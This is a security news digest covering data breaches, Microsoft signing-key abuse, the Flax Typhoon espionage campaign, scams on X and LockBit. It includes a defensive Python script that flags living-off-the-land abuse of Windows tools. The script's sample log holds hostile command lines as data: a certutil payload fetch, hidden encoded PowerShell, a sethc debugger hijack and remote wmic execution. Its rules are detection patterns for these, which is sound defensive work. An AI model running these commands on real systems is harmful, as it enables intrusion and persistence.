AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 08/28/2023

FTX, BlockFi’s Customer Data Compromised in Kroll Hack

Customer data of bankrupt crypto exchange FTX and lender BlockFi has been compromised due to a hack of Kroll, a third-party agent that manages creditor claims on behalf of bankrupt companies. Crypto account passwords and other sensitive data weren’t affected, but customers were warned to be on the lookout for scammers impersonating parties in the bankruptcy. An “unauthorized third party gained access to certain BlockFi client data housed on Kroll’s platform,” BlockFi said in a tweeted statement, and FTX said it was “closely monitoring the situation.”

Microsoft signing keys keep getting hijacked, to the delight of Chinese threat actors

In July, security researchers revealed a sobering discovery: hundreds of pieces of malware used by multiple hacker groups to infect Windows devices had been digitally signed and validated as safe by Microsoft itself. On Tuesday, a different set of researchers made a similarly solemn announcement: Microsoft’s digital keys had been hijacked to sign yet more malware for use by a previously unknown threat actor in a supply-chain attack that infected roughly 100 carefully selected victims.

Privacy regulators tell social media companies to fear the scrapers

Social media companies and other businesses have an obligation to protect users’ publicly available information from data scrapers that gather it for unintended purposes, an international group of privacy regulators said Thursday. “Personal information that is publicly accessible is still subject to data protection and privacy laws in most jurisdictions,” 12 agencies said in a joint statement. Stopping unlawful data scraping requires “multi-layered technical and procedural controls,” the agencies said, and “vigilance is paramount.”

China Unleashes Flax Typhoon APT to Live Off the Land, Microsoft Warns

A China-backed advanced persistent threat (APT) group dubbed Flax Typhoon has installed a web of persistent, long-term infections inside dozens of Taiwanese organizations, likely to carry out an extensive cyber espionage campaign — and it did it using only minimal amounts of malware. According to Microsoft, the state-sponsored cyberattack group is living off the land for the most part, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent operation.
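The living-off-the-land pattern Microsoft describes is what makes such intrusions hard to spot: every process involved is a signed, built-in Windows binary, so file-based detection sees nothing. As an added example (not code from Microsoft's report or from the original post), the Python script below triages constructed process-creation records for a handful of generic LOLBin abuse patterns. The pipe-delimited log format, host names, IP addresses and the rule set are assumptions for illustration; they are not a claim about Flax Typhoon's specific tradecraft.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # parent process image path
    image: str    # image path of the newly created process
    cmdline: str  # full command line


# Constructed sample telemetry (not real logs) in an assumed
# "host|parent_image|image|command_line" line format, such as one might
# export from Windows Security event 4688 or Sysmon event 1.
SAMPLE_LOG = r"""
WS01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt
WS01|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://203.0.113.5/a.txt a.txt
SRV02|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
SRV02|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
WS01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgA
SRV02|C:\Windows\System32\cmd.exe|C:\Windows\System32\reg.exe|reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d cmd.exe
SRV02|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:10.0.0.7 process call create "cmd.exe /c net user"
"""


def parse_events(text: str) -> List[ProcEvent]:
    """Parse the assumed pipe-delimited export; the command line may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(host, parent, image, cmdline))
    return events


def _base(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Heuristics for abuse of built-in Windows tools. Each entry is (rule name, predicate).
# These are illustrative patterns, not a complete or vendor-specific rule set.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("certutil used to fetch or decode a payload",
     lambda e: _base(e.image) == "certutil.exe"
     and re.search(r"-(urlcache|decode|encode)\b", e.cmdline, re.I) is not None),
    ("encoded or hidden PowerShell",
     lambda e: _base(e.image) in ("powershell.exe", "pwsh.exe")
     and re.search(r"(^|\s)-(e|ec|enc|encodedcommand|w(indowstyle)?\s+hidden)\b",
                   e.cmdline, re.I) is not None),
    ("shell spawned by the WMI provider host",
     lambda e: _base(e.parent) == "wmiprvse.exe"
     and _base(e.image) in ("cmd.exe", "powershell.exe", "pwsh.exe")),
    ("IFEO Debugger value set (accessibility-feature hijack pattern)",
     lambda e: _base(e.image) == "reg.exe"
     and re.search(r"image file execution options", e.cmdline, re.I) is not None
     and re.search(r"/v\s+debugger\b", e.cmdline, re.I) is not None),
    ("remote process creation via wmic",
     lambda e: _base(e.image) == "wmic.exe"
     and re.search(r"process\s+call\s+create", e.cmdline, re.I) is not None),
]


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, command line) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((e.host, name, e.cmdline))
    return hits


if __name__ == "__main__":
    for host, rule, cmd in triage(parse_events(SAMPLE_LOG)):
        print(f"[{host}] {rule}: {cmd}")
```

Run against the constructed sample, the benign notepad and svchost launches pass while the five LOLBin patterns are flagged. The point of keying on parent/child relationships and command-line arguments rather than on image hashes is exactly that the binaries themselves are legitimate; in production the same logic would sit on top of real 4688 or Sysmon telemetry with allow-lists tuned for the environment's administrative tooling.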

Genworth Financial Under Investigation for Data Breach

Schubert Jonckheer & Kolbe LLP is investigating a data breach impacting the personal information of over 2.5 million customers, policyholders, and agents of Genworth Financial, Inc. and its affiliated life insurance companies. The data breach, first disclosed on May 31, 2023, stemmed from a third-party vendor’s use of the popular MOVEit file transfer program, which attackers exploited using a security vulnerability reportedly present in software versions dating back to 2021. Genworth contracts with the vendor, PBI Research Services, to identify member deaths. PBI used the exploited software program to transfer files containing the sensitive personal information of certain Genworth customers and insurance agents.

Blue-tick scammers target consumers who complain on X

Consumers who complain of poor customer service on X are being targeted by scammers after the social media platform formerly known as Twitter changed its account verification process. Bank customers and airline passengers are among those at risk of phishing scams when they complain to companies via X. Fraudsters, masquerading as customer service agents, respond under fake X handles and trick victims into disclosing their bank details to get a promised refund. They typically win the trust of victims by displaying the blue checkmark icon, which until this year denoted accounts that had been officially verified by X.

Lockbit leak, research opportunities on tools leaked from TAs

Lockbit is one of the most prevalent ransomware strains. It comes with an affiliate ransomware-as-a-service (RaaS) program offering up to 80% of the ransom demand to participants, and includes a bug bounty program for those who detect and report vulnerabilities that allow files to be decrypted without paying the ransom. According to the Lockbit owners, the namesake cybercriminal group, there have been bounty payments of up to 50 thousand dollars. In addition to these features, Lockbit has offered a searchable portal to query leaked information from companies targeted by this ransomware family, and even offered payment to those who get tattooed with a Lockbit logo on their body.